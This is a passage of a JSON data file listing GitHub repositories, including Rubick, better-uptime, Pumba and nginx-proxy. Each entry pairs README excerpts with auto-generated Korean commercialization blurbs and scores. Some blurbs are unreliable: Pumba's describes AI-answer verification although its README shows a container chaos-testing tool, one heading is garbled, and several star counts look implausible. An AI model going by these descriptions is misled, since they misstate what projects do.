browse","composite_score":0.1244,"license_safety_tag":"safe"},{"name":"clouDr-f2e/rubick","github_url":"https://github.com/clouDr-f2e/rubick","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# Rubick 저장소 분석\n\n## 왜 보물인가\n개발자들이 자주 반복하는 작업을 자동화해주는 도구로, 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 도구 SaaS**: 팀원들이 공통으로 사용하는 자동화 작업을 클라우드 기반으로 제공\n2. **회사 내부 업무 자동화**: IT팀이 반복적인 개발 작업을 줄이기 위한 사내 ","readme_excerpt":"English | [简体中文](./README.zh-CN.md)\n\n<div align= \"center\">\n<img align=\"center\" width=200 src=\"./public/logo.png\" />\n</div>\n\n<div align=\"center\">\n    <h1>Rubick</h1>\n    <img alt=\"downloads\" src=\"https://img.shields.io/github/downloads/rubickCenter/rubick/total\" />\n    <a href=\"https://github.com/rubickCenter/rubick/releases\"><img alt=\"latest release\" src=\"https://img.shields.io/github/package-json/v/rubickCenter/rubick\" /></a>\n    <a href=\"https://github.com/rubickCenter/rubick/actions\"><img alt=\"github action building\" src=\"https://img.shields.io/github/actions/workflow/status/rubickCenter/rubick/main.yml\" /></a>\n    <a href=\"https://github.com/rubickCenter/rubick/blob/master/LICENSE\"><img alt=\"license\" src=\"https://img.shields.io/github/license/rubickCenter/rubick\" /></a>\n    <a href=\"https://github.com/rubickCenter/rubick/stargazers\"><img alt=\"github stars\" src=\"https://img.shields.io/github/stars/rubickCenter/rubick?style=social\" /></a>\n    <a href=\"https://gitee.com/monkeyWang/rub","composite_score":0.1241,"license_safety_tag":"safe"},{"name":"el0wa/better-uptime","github_url":"https://github.com/el0wa/better-uptime","stars":9,"language":"JavaScript","license":"Apache-2.0","abandonment_months":6,"description":"# better-uptime 저장소 분석\n\n## 왜 보물인가\n웹사이트나 서비스가 언제 먹통이 되는지 자동으로 감시하고 알려주는 오픈소스 솔루션으로, 기업들이 고가의 모니터링 서비스 대신 직접 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 자체 웹사이트나 API 서버의 장애를 실시간으로 감시하고 고객에게 상태 대시보드 ","readme_excerpt":"## What is this module ?\n\nThis module helps to uptime 7/24 a project easily.\n\n## How can i use ?\n\n```js\nconst { Uptime } = require(\"better-uptime\")\n\nvar uptime = new Uptime({\n  url: \"https://your.domain/\",//project link\n  time: 1,//time\n  time_type: 'minute',// you can use millisecond, minute, hour, day, week\n  callback: \"console.log('your.domain successfully uptime!')\"//callback function action to be performed each time it uptimes\n})\n```\n\n# Documentation\n\n| Method        | Type           | Description |\n| ------------- |:-------------:|:--------------:|\n| new Uptime() | Object | You can uptime your project or any other project |\n\n# 'new Uptime()' options\n\n| Option        | Type          | Description |\n| ------------- |:-------------:|:--------------:|\n| url: \"https://your.domain\" | String | You can add your link with this option |\n| time: 1 | Number | You specify interval |\n| time_type: \"minute\" | String | You specify interval type |\n| callback: \"console.log('your.domain successfully","composite_score":0.1235,"license_safety_tag":"safe"},{"name":"dano-inc/react-query-helper","github_url":"https://github.com/dano-inc/react-query-helper","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":6,"description":"# react-query-helper 사업화 분석\n\n## 왜 보물인가\n웹 개발자들이 반복해서 작성하는 데이터 조회 코드를 자동으로 만들어주는 도구로, 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 보유한 개발 도구로 제공하여 고객사 개발 생산성 향상\n2. **내부 업무 도구**: 자체 웹 애플리케이","readme_excerpt":"# React Query Helper\n\n[![npm version](https://badge.fury.io/js/react-query-helper.svg)](https://badge.fury.io/js/react-query-helper) ![npm bundle size](https://img.shields.io/bundlephobia/min/react-query-helper) ![npm bundle size](https://img.shields.io/bundlephobia/minzip/react-query-helper) [![Test](https://github.com/dano-inc/react-query-helper/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/dano-inc/react-query-helper/actions/workflows/test.yml) [![codecov](https://codecov.io/gh/dano-inc/react-query-helper/branch/main/graph/badge.svg?token=TD9B2BKN24)](https://codecov.io/gh/dano-inc/react-query-helper) ![GitHub](https://img.shields.io/github/license/dano-inc/react-query-helper)\n\nA helper library to help you use [React Query](https://react-query.tanstack.com/) more easily and consistently.\n\n## Features\n\n- **Write query key once, use everywhere.** you don't have to remember something's query key; the query key will be generated with your baseQueryKey and argumen","composite_score":0.1235,"license_safety_tag":"safe"},{"name":"japp-fi/polymarket-mcp-server","github_url":"https://github.com/japp-fi/polymarket-mcp-server","stars":148,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1235,"license_safety_tag":"unknown"},{"name":"learn-anything/learn-anything","github_url":"https://github.com/learn-anything/learn-anything","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":4,"description":"# learn-anything 저장소 분석\n\n## 왜 보물인가\n누구나 새로운 것을 배울 때 어디서부터 시작할지 몰라 막히는데, 이 프로젝트는 체계적인 학습 경로를 제시해주는 디지털 가이드맵입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 학습자를 위한 구독형 교육 플랫폼으로, 사용자가 원하는 주제별 맞춤 학습 경로를 제공합니다.\n2. ","readme_excerpt":"# [linsa.io](https://linsa.io)\n\nThe idea behind the project is simple. Store any kind of digital content in a way that only you have access to it (end to end encryption).\n\nProvide top tier experiences on top with lots more things.\n\nCurrently the author of this project does not have time to develop this in public but at some point this will be open source and be developed in the open.\n","composite_score":0.1232,"license_safety_tag":"unknown"},{"name":"solkimicreb/react-easy-state","github_url":"https://github.com/solkimicreb/react-easy-state","stars":6,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# react-easy-state 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 복잡한 데이터 관리를 단순하게 만들어주는 도구로, 개발 난이도를 낮추고 개발 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 협업 도구(노션 같은 문서편집기, 팀 프로젝트 관리 앱)에서 여러 사용자의 데이터 변경사항을 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"images/logo.svg\" width=\"600px\" height=\"auto\" />\n</p>\n\n## React Easy State - by [RisingStack](https://risingstack.com/)\n\n[![Build](https://img.shields.io/circleci/project/github/RisingStack/react-easy-state/master.svg)](https://circleci.com/gh/RisingStack/react-easy-state/tree/master) [![dependencies Status](https://david-dm.org/RisingStack/react-easy-state/status.svg)](https://david-dm.org/RisingStack/react-easy-state) [![Coverage Status](https://coveralls.io/repos/github/RisingStack/react-easy-state/badge.svg?branch=master&service=github)](https://coveralls.io/github/RisingStack/react-easy-state?branch=master) [![Package size](https://img.shields.io/bundlephobia/minzip/@risingstack/react-easy-state.svg)](https://bundlephobia.com/result?p=@risingstack/react-easy-state) [![Version](https://img.shields.io/npm/v/@risingstack/react-easy-state.svg)](https://www.npmjs.com/package/@risingstack/react-easy-state) [![License](https://img.shields.io/npm/l/@risingsta","composite_score":0.1232,"license_safety_tag":"safe"},{"name":"pydanny/cookiecutter-django","github_url":"https://github.com/pydanny/cookiecutter-django","stars":6,"language":"Python","license":"bsd-3-clause","abandonment_months":0,"description":"# cookiecutter-django 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기본 틀을 미리 준비해둔 것으로, 개발자들이 처음부터 다시 만들지 않고 빠르게 시작할 수 있습니다.\n\n## 어디에 �tudy 수 있나\n1. **SaaS 서비스**: 구독 기반 웹 애플리케이션(예: 프로젝트 관리 도구, 온라인 협업 플랫폼)의 초기 구축에 활용","readme_excerpt":"# Cookiecutter Django\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/cookiecutter/cookiecutter-django/ci.yml?branch=main)](https://github.com/cookiecutter/cookiecutter-django/actions/workflows/ci.yml?query=branch%3Amain)\n[![Documentation Status](https://readthedocs.org/projects/cookiecutter-django/badge/?version=latest)](https://cookiecutter-django.readthedocs.io/en/latest/?badge=latest)\n[![pre-commit.ci status](https://results.pre-commit.ci/badge/github/cookiecutter/cookiecutter-django/main.svg)](https://results.pre-commit.ci/latest/github/cookiecutter/cookiecutter-django/main)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/ambv/black)\n\n[![Updates](https://pyup.io/repos/github/cookiecutter/cookiecutter-django/shield.svg)](https://pyup.io/repos/github/cookiecutter/cookiecutter-django/)\n[![Join our Discord](https://img.shields.io/badge/Discord-cookiecutter-5865F2?style=flat&logo=discord&logoColor=white)](htt","composite_score":0.1231,"license_safety_tag":"safe"},{"name":"hs-web/hsweb-framework","github_url":"https://github.com/hs-web/hsweb-framework","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# hs-web/hsweb-framework 평가 보고서\n\n## 왜 보물인가\n복잡한 업무 관리 시스템을 빠르게 만들 수 있는 기초 도구 모음으로, 중소 기업의 업무 자동화 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 기업의 인사, 재무, 재고 관리 시스템을 빠르게 구축하여 엑셀 작업을 줄이고 효율성을 높입니다.","readme_excerpt":"# hsweb4 基于spring-boot2,全响应式的后台管理框架\n\n[![Codecov](https://codecov.io/gh/hs-web/hsweb-framework/branch/4.0.x/graph/badge.svg)](https://codecov.io/gh/hs-web/hsweb-framework/branch/master)\n[![Build Status](https://api.travis-ci.com/hs-web/hsweb-framework.svg?branch=4.0.x)](https://travis-ci.com/hs-web/hsweb-framework)\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg?style=flat-square)](https://www.apache.org/licenses/LICENSE-2.0.html)\n\n# 功能,特性\n\n- [x] 基于[r2dbc](https://github.com/r2dbc) ,[easy-orm](https://github.com/hs-web/hsweb-easy-orm/tree/4.0.x) 的通用响应式CRUD\n    - [x] H2,Mysql,SqlServer,PostgreSQL\n- [x] 响应式r2dbc事务控制\n- [x] 响应式权限控制,以及权限信息获取\n    - [x] RBAC权限控制\n    - [x] 数据权限控制\n    - [ ] 双因子验证\n- [x] 多维度权限管理功能\n- [x] 响应式缓存\n- [ ] 非响应式支持(mvc,jdbc)\n- [ ] 内置业务功能\n    - [x] 权限管理\n        - [x] 用户管理\n        - [x] 权限设置\n        - [x] 权限分配\n    - [ ] 文件上传\n        - [x] 静态文件上传\n        - [ ] 文件秒传\n    - [x] 数据字典\n\n# 示例\n\nhttps://github.com/zhou-hao/hsweb4-examples\n\n## 应用场景\n\n1. 完全开源的后台管理系统","composite_score":0.1229,"license_safety_tag":"safe"},{"name":"GoogleChromeLabs/react-adaptive-hooks","github_url":"https://github.com/GoogleChromeLabs/react-adaptive-hooks","stars":13,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# GoogleChromeLabs/react-adaptive-hooks 분석\n\n## 왜 보물인가\n스마트폰의 배터리, 네트워크 속도, 화면 크기 등을 자동으로 감지하여 앱을 똑똑하게 동작하게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 스트리밍 서비스**: 느린 인터넷에서는 화질을 자동으로 낮추고, 배터리 부족 시 고화질 재생을 제한하는 기","readme_excerpt":"# React Adaptive Loading Hooks &amp; Utilities &middot; ![](https://img.shields.io/github/license/GoogleChromeLabs/react-adaptive-hooks.svg) [![Build Status](https://travis-ci.org/GoogleChromeLabs/react-adaptive-hooks.svg?branch=master)](https://travis-ci.org/GoogleChromeLabs/react-adaptive-hooks) ![npm bundle size](https://img.shields.io/bundlephobia/minzip/react-adaptive-hooks)\n\n> Deliver experiences best suited to a user's device and network constraints (experimental)\n\nThis is a suite of [React Hooks](https://reactjs.org/docs/hooks-overview.html) and utilities for adaptive loading based on a user's:\n\n* [Network via effective connection type](https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/effectiveType)\n* [Data Saver preferences](https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/saveData)\n* [Device memory](https://developer.mozilla.org/en-US/docs/Web/API/Navigator/deviceMemory)\n* [Logical CPU cores](https://developer.mozilla.org/en-US/docs/Web/A","composite_score":0.1227,"license_safety_tag":"safe"},{"name":"gaia-adm/pumba","github_url":"https://github.com/gaia-adm/pumba","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# Pumba 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 답변의 신뢰성을 검증하는 기술로, 잘못된 정보 제공으로 인한 기업의 법적·평판 위험을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **AI 고객지원 플랫폼**: 챗봇이 고객에게 제공하는 답변의 정확성을 실시간으로 검증하여 오류 방지\n- **금융·보험 상담 API**: 자동 상담 시스템이 제시","readme_excerpt":"<p align=\"center\">\n  <img src=\"docs/img/pumba_logo.png\" alt=\"Pumba\" width=\"300\">\n  <br>\n  <strong>Chaos testing tool for Docker, containerd, and Podman</strong>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/alexei-led/pumba/releases\"><img src=\"https://img.shields.io/github/v/release/alexei-led/pumba\" alt=\"GitHub Release\"></a>\n  <a href=\"https://github.com/alexei-led/pumba/actions/workflows/release.yaml\"><img src=\"https://github.com/alexei-led/pumba/actions/workflows/release.yaml/badge.svg\" alt=\"Release\"></a>\n  <a href=\"https://github.com/alexei-led/pumba/actions/workflows/build.yaml\"><img src=\"https://github.com/alexei-led/pumba/actions/workflows/build.yaml/badge.svg\" alt=\"Build and Test\"></a>\n  <a href=\"https://goreportcard.com/report/github.com/alexei-led/pumba\"><img src=\"https://goreportcard.com/badge/github.com/alexei-led/pumba\" alt=\"Go Report Card\"></a>\n  <a href=\"https://codecov.io/gh/alexei-led/pumba\"><img src=\"https://codecov.io/gh/alexei-led/pumba/branch/master/graph/","composite_score":0.1226,"license_safety_tag":"safe"},{"name":"DSpeichert/netbootd","github_url":"https://github.com/DSpeichert/netbootd","stars":5,"language":"Go","license":"NOASSERTION","abandonment_months":6,"description":"# netbootd 저장소 분석\n\n## 왜 보물인가\n컴퓨터를 원격으로 부팅하고 관리할 수 있는 기술로, 데이터센터나 대규모 조직에서 수백 대의 기기를 효율적으로 운영할 때 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 관리 SaaS**: 기업의 수백 대 서버를 한 곳에서 원격 재부팅하고 상태를 모니터링하는 웹 서비스\n2. **IT","readme_excerpt":"# netbootd\n\nnetbootd is a lightweight network boot server, designed for maximum flexibility\nand with \"batteries included\" approach in mind, serving as a DHCP, TFTP, Syslog and HTTP server.\nIt includes a basic templating functionality, designed to allow generating e.g. preseed\nfiles for unattended OS installation.\n\nIt can be compared to [Foreman](https://github.com/theforeman/foreman) or [Cobbler](https://github.com/cobbler/cobbler),\nas the goal is to PXE-boot a machine into an operating system or installation environment.\n\nUnlike Foreman and Cobbler, netbootd is actually a DHCP, TFTP and HTTP server.\nIt does not require any other software to be used.\n\nnetbootd aims to provide maximum flexibility and unlike Foreman or Cobbler makes\nno attempt to simplify the process of network booting. The results will be only\nas good as the configuration (the manifest in this case).\n\nnetbootd's configuration consists of a set of manifests, with each manifest representing a machine\nto be provisioned. Ne","composite_score":0.1225,"license_safety_tag":"unknown"},{"name":"LawnchairLauncher/Lawnchair","github_url":"https://github.com/LawnchairLauncher/Lawnchair","stars":8,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"# Lawnchair 16\n\n[![Build debug APK](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/ci.yml/badge.svg)](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/ci.yml)\n[![Build release APK](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/release_update.yml/badge.svg)](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/release_update.yml)\n[![Crowdin](https://badges.crowdin.net/e/188ba69d884418987f0b7f1dd55e3a4e/localized.svg)](https://lawnchair.crowdin.com/lawnchair)\n[![OpenCollective](https://img.shields.io/opencollective/all/lawnchair?label=financial%20contributors&logo=open-collective)](https://opencollective.com/lawnchair)\n[![Telegram](https://img.shields.io/endpoint?url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Flccommunity)](https://t.me/lccommunity)\n[![Discord](https://img.shields.io/discord/803299970169700402?label=server&logo=discord)](https://discord.gg/3x8qNWxgGZ)\n[![GitHub Downloads](https://img.shields.io/github/downloads","composite_score":0.1224,"license_safety_tag":"unknown"},{"name":"jwilder/nginx-proxy","github_url":"https://github.com/jwilder/nginx-proxy","stars":9,"language":"Python","license":"mit","abandonment_months":0,"description":"# nginx-proxy 기술 자산 분석\n\n## 왜 보물인가\n웹사이트 여러 개를 하나의 서버에서 쉽게 관리할 수 있게 해주는 자동화 도구로, 수동 설정 작업을 90% 이상 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객사마다 별도 도메인으로 접속하게 해주는 멀티테넌트 플랫폼 (예: 소상공인용 예약 시스템 SaaS)\n2. ","readme_excerpt":"[![Test](https://github.com/nginx-proxy/nginx-proxy/actions/workflows/test.yml/badge.svg)](https://github.com/nginx-proxy/nginx-proxy/actions/workflows/test.yml)\n[![GitHub release](https://img.shields.io/github/v/release/nginx-proxy/nginx-proxy)](https://github.com/nginx-proxy/nginx-proxy/releases)\n[![nginx 1.31.0](https://img.shields.io/badge/nginx-1.31.0-brightgreen.svg?logo=nginx)](https://nginx.org/en/CHANGES)\n[![Docker Image Size](https://img.shields.io/docker/image-size/nginxproxy/nginx-proxy?sort=semver)](https://hub.docker.com/r/nginxproxy/nginx-proxy \"Click to view the image on Docker Hub\")\n[![Docker stars](https://img.shields.io/docker/stars/nginxproxy/nginx-proxy.svg)](https://hub.docker.com/r/nginxproxy/nginx-proxy \"DockerHub\")\n[![Docker pulls](https://img.shields.io/docker/pulls/nginxproxy/nginx-proxy.svg)](https://hub.docker.com/r/nginxproxy/nginx-proxy \"DockerHub\")\n\nnginx-proxy sets up a container running nginx and [docker-gen](https://github.com/nginx-proxy/docker-gen).","composite_score":0.1222,"license_safety_tag":"safe"},{"name":"HansiChan/SoccerPredictor","github_url":"https://github.com/HansiChan/SoccerPredictor","stars":11,"language":"Python","license":"unknown","abandonment_months":6,"description":"# SoccerPredictor 상용화 분석\n\n## 왜 보물인가\n축구 경기 결과를 미리 예측하는 기술로, 스포츠 베팅·팬 서비스·구단 분석 등 다양한 산업에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 축구팬들을 위한 경기 결과 예측 앱/웹사이트 구독 서비스\n- **내부 업무 도구**: 스포츠 베팅 회사나 구단이 자체적","readme_excerpt":"# SoccerPredictor\nA goals prediction model based on Big-data and machine learning.\n\n## Project Introduction\n\nSoccerPredictor is a football match prediction system based on the XGBoost machine learning algorithm, which can predict the outcome of the match and the over/under result.\n\n## Main Functions\n\n- **Data Collection**: Crawl match data and odds information from sports websites\n- **Model Training**: Train prediction models for wins and losses and over/under based on historical data\n- **Result Prediction**: Use trained models to predict future matches\n- **Data Storage**: Support Impala/Kudu database storage\n\n## Project Structure\n\n```\nSoccerPredictor/\n├── DAO/                    # Data Access Layer\n│   └── ImpalaCon.py       # Impala/Kudu database connection\n├── Spider/                 # Web Crawler\n│   └── GameSpider.py      # Match data crawling\n├── XGBoost/               # Machine Learning Model\n│   └── Predictor.py       # Model training and prediction\n├── Models/                #","composite_score":0.1222,"license_safety_tag":"unknown"},{"name":"STRML/react-grid-layout","github_url":"https://github.com/STRML/react-grid-layout","stars":6,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# STRML/react-grid-layout 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 원하는 대로 창과 박스를 자유롭게 움직이고 크기를 조절할 수 있는 기능을 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 데이터 분석 대시보드**\n사용자가 각자 필요한 차트와 통계를 원하는 위치에 배치할 수 있는 맞","readme_excerpt":"# React-Grid-Layout\n\n[![npm package](https://img.shields.io/npm/v/react-grid-layout.svg?style=flat-square)](https://www.npmjs.org/package/react-grid-layout)\n[![npm downloads](https://img.shields.io/npm/dt/react-grid-layout.svg?maxAge=2592000)]()\n\nReact-Grid-Layout is a grid layout system much like [Packery](http://packery.metafizzy.co/) or\n[Gridster](http://dsmorse.github.io/gridster.js/), for React.\n\nUnlike those systems, it is responsive and supports breakpoints. Breakpoint layouts can be provided by the user\nor autogenerated.\n\nRGL is React-only and does not require jQuery.\n\n![BitMEX UI](http://i.imgur.com/oo1NT6c.gif)\n\n> GIF from production usage on [BitMEX.com](https://www.bitmex.com)\n\n[**[Demo](https://react-grid-layout.github.io/react-grid-layout/) | [Changelog](/CHANGELOG.md) | [CodeSandbox Editable demo](https://codesandbox.io/p/sandbox/5ywf7c)**]\n\n## Table of Contents\n\n- [What's New in v2](#whats-new-in-v2)\n- [Migrating from v1](#migrating-from-v1)\n- [Demos](#demos)\n- [Feature","composite_score":0.122,"license_safety_tag":"safe"},{"name":"IanVS/eslint-nibble","github_url":"https://github.com/IanVS/eslint-nibble","stars":6,"language":"JavaScript","license":"mit","abandonment_months":6,"description":"# eslint-nibble 분석\n\n## 왜 보물인가\n웹사이트나 앱 개발 시 코드의 실수를 자동으로 찾아주는 도구를 점진적으로 도입할 수 있게 해주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 기존 프로젝트에 천천히 코드 검사 규칙을 추가할 수 있는 웹 플랫폼\n2. **내부 업무 도구**: 대규모 개발팀이 여러 프로젝트","readme_excerpt":"# eslint-nibble\n\n[![npm][npm-badge]][npm-badge-url]\n[![Build Status][travis-badge]][travis-badge-url]\n\nSometimes running ESLint against an existing project and fixing the hundreds or thousands of errors is biting off more than you can chew.  \nInstead, `eslint-nibble` will give a quick overview of your failing rules, and then show the detailed error reports for one rule at a time.\n\nIf a rule can be automatically fixed by ESLint, `eslint-nibble` will allow you to run autofix on individual rules, allowing you to make more focused commits.\n\nRead this excellent blog post from [Paul Hands](https://github.com/paulhands) for a clear explanation of what eslint-nibble can do for your project: [Hiring a gardener to trim the weeds](https://medium.com/@paul.hands.phd/hiring-a-gardener-to-trim-the-weeds-adding-a-linter-halfway-through-building-an-application-194c527db151).\n\n## Installation\n\n```bash\nnpm install --no-save eslint-nibble\n```\n\nYou can also install `eslint-nibble` globally, but it is not ","composite_score":0.122,"license_safety_tag":"safe"},{"name":"ctrlplusb/easy-peasy","github_url":"https://github.com/ctrlplusb/easy-peasy","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# easy-peasy 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 개발 과정을 자동으로 수정하고 검색해주는 도구로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀을 위한 코드 자동 수정 클라우드 플랫폼으로 월 구독료 수익 모델 운영\n2. **내부 업무 도구**: 대규모 IT 기업의 소프트웨어 ","readme_excerpt":"<p>&nbsp;</p>\n<p align='center'>\n  <img src=\"./website/docs/assets/logo-small.png\" width=\"150\" />\n</p>\n<p align='center'><strong>Vegetarian friendly state for React</strong></p>\n<p>&nbsp;</p>\n\n[![npm](https://img.shields.io/npm/v/easy-peasy.svg?style=flat-square)](http://npm.im/easy-peasy)\n[![MIT License](https://img.shields.io/npm/l/easy-peasy.svg?style=flat-square)](http://opensource.org/licenses/MIT)\n[![Codecov](https://img.shields.io/codecov/c/github/ctrlplusb/easy-peasy.svg?style=flat-square)](https://codecov.io/github/ctrlplusb/easy-peasy)\n\n> **v7 Beta** — this release modernises Easy Peasy around React 19's concurrent\n> primitives. The public store/model API is unchanged from v6 and the library is\n> feature-complete, but the v7 line is still in beta — APIs may shift in\n> response to feedback before the stable release. See the\n> [v6 → v7 upgrade guide](https://easy-peasy.dev/docs/upgrading-from-v6/) for\n> details, or view the [v6 docs](https://easy-peasy-v6.vercel.app/) for the\n>","composite_score":0.122,"license_safety_tag":"safe"},{"name":"browserless/chrome","github_url":"https://github.com/browserless/chrome","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# browserless/chrome 상용화 분석\n\n## 왜 보물인가\n웹사이트 자동 수집과 스크린샷 생성을 간단하게 처리할 수 있는 도구로, 복잡한 기술 없이도 웹 데이터 자동화가 필요한 회사들의 필수 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 모니터링 서비스(경쟁사 가격 추적, 콘텐츠 변화 감지) 제공\n2. **내","readme_excerpt":"<!-- markdownlint-disable commands-show-output first-line-h1 no-emphasis-as-heading no-inline-html -->\n\n<div align=\"center\">\n  <a href=\"https://browserless.io\" align=\"center\">\n    <center align=\"center\">\n      <picture>\n        <source media=\"(prefers-color-scheme: dark)\" srcset=\"./assets/logo-white.svg\" width=\"600\">\n        <source media=\"(prefers-color-scheme: light)\" srcset=\"./assets/logo.svg\" width=\"600\">\n        <img src=\"./assets/logo.svg\" alt=\"Browserless logo\" width=\"600\">\n      </picture>\n    </center>\n  </a>\n\n  <h3>Deploy headless browsers in Docker. Run on our cloud or bring your own.</h3>\n\n  <p>\n    <a href=\"https://browserless.io/\">\n      <img src=\"https://img.shields.io/badge/🧪_Try_on_Cloud-4A90E2?style=for-the-badge\" alt=\"Try on Cloud\" />\n    </a>\n    &nbsp;&nbsp;\n    <a href=\"#-1-minute-quickstart\">\n      <img src=\"https://img.shields.io/badge/📦_Run_Locally-34A853?style=for-the-badge\" alt=\"Run Locally\" />\n    </a>\n    &nbsp;&nbsp;\n    <a href=\"https://docs.browserless.i","composite_score":0.1219,"license_safety_tag":"unknown"},{"name":"CarGuo/GSYGithubAppFlutter","github_url":"https://github.com/CarGuo/GSYGithubAppFlutter","stars":5,"language":"Dart","license":"apache-2.0","abandonment_months":2,"description":"# GSYGithubAppFlutter 평가 보고서\n\n## 왜 보물인가\n깃허브(프로그래머들이 협업하는 플랫폼) 앱을 개발하는 완성된 예제로, 새로운 앱 개발자들의 학습 교재이자 시작점이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 앱 SaaS**: 이 기술을 기반으로 개발자 전용 협업 앱을 구독형으로 판매\n2. **기업 내부 코드 ","readme_excerpt":"![](./logo.png)\n\n[![Github Actions](https://github.com/CarGuo/gsy_github_app_flutter/workflows/CI/badge.svg)](https://github.com/CarGuo/gsy_github_app_flutter/actions)\n[![GitHub stars](https://img.shields.io/github/stars/CarGuo/GSYGithubAppFlutter.svg)](https://github.com/CarGuo/GSYGithubAppFlutter/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/CarGuo/GSYGithubAppFlutter.svg)](https://github.com/CarGuo/GSYGithubAppFlutter/network)\n[![GitHub issues](https://img.shields.io/github/issues/CarGuo/GSYGithubAppFlutter.svg)](https://github.com/CarGuo/GSYGithubAppFlutter/issues)\n[![GitHub license](https://img.shields.io/github/license/CarGuo/GSYGithubAppFlutter.svg)](https://github.com/CarGuo/GSYGithubAppFlutter/blob/master/LICENSE)\n[![star](https://gitcode.com/ZuoYueLiang/gsy_github_app_flutter/star/badge.svg)](https://gitcode.com/ZuoYueLiang/gsy_github_app_flutter)\n\n\n### [English Readme](https://github.com/CarGuo/GSYGithubAppFlutter/blob/master/README_EN.md)\n\n\n## 一款跨平台的开源Git","composite_score":0.1218,"license_safety_tag":"safe"},{"name":"Playtika/testcontainers-spring-boot","github_url":"https://github.com/Playtika/testcontainers-spring-boot","stars":8,"language":"Java","license":"mit","abandonment_months":0,"description":"# Playtika/testcontainers-spring-boot 분석\n\n## 왜 보물인가\n소프트웨어 개발 시 품질 검증 작업을 자동화하는 도구로, 개발자들이 버그를 빠르게 찾을 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발 플랫폼 회사가 자동 테스트 기능을 고객에게 제공하는 부가 서비스\n2. **내부 업무 도구**:","readme_excerpt":"= Testcontainers Spring Boot\n\nhttps://codecov.io/gh/PlaytikaOSS/testcontainers-spring-boot[image:https://codecov.io/gh/PlaytikaOSS/testcontainers-spring-boot/graph/badge.svg?token=9E0VBFIB5B[codecov]]\nhttps://maven-badges.sml.io/sonatype-central/com.playtika.testcontainers/testcontainers-spring-boot[image:https://maven-badges.sml.io/sonatype-central/com.playtika.testcontainers/testcontainers-spring-boot/badge.svg[Sonatype Central]]\n\nIf you develop services using Spring Boot and maybe Spring Cloud and you do\nhttps://testing.googleblog.com/2010/12/test-sizes.html[medium sized] tests during build process, then this set of\nSpring Boot auto-configurations might be handy. By adding module into classpath, you will get stateful service,\nlike Couchbase or Kafka, auto-started and available for connection from your application service w/o wiring any\nadditional code. https://www.docker.com/[Docker] and https://www.testcontainers.org/[TestContainers] are used to\nbootstrap stateful service using Spr","composite_score":0.1218,"license_safety_tag":"safe"},{"name":"apache/incubator-shenyu","github_url":"https://github.com/apache/incubator-shenyu","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Apache ShenYu 상용화 분석\n\n## 왜 보물인가\n여러 서비스를 하나로 연결해주는 중앙 관리 플랫폼으로, 기업의 복잡한 시스템 운영을 획기적으로 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 소프트웨어를 사용하는 기업에게 통합 관리 대시보드를 제공하는 서비스\n2. **내부 업무 도구**: 기업 내 흩어진 데","readme_excerpt":"![Light Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo-light.svg#gh-dark-mode-only)\n![Dark 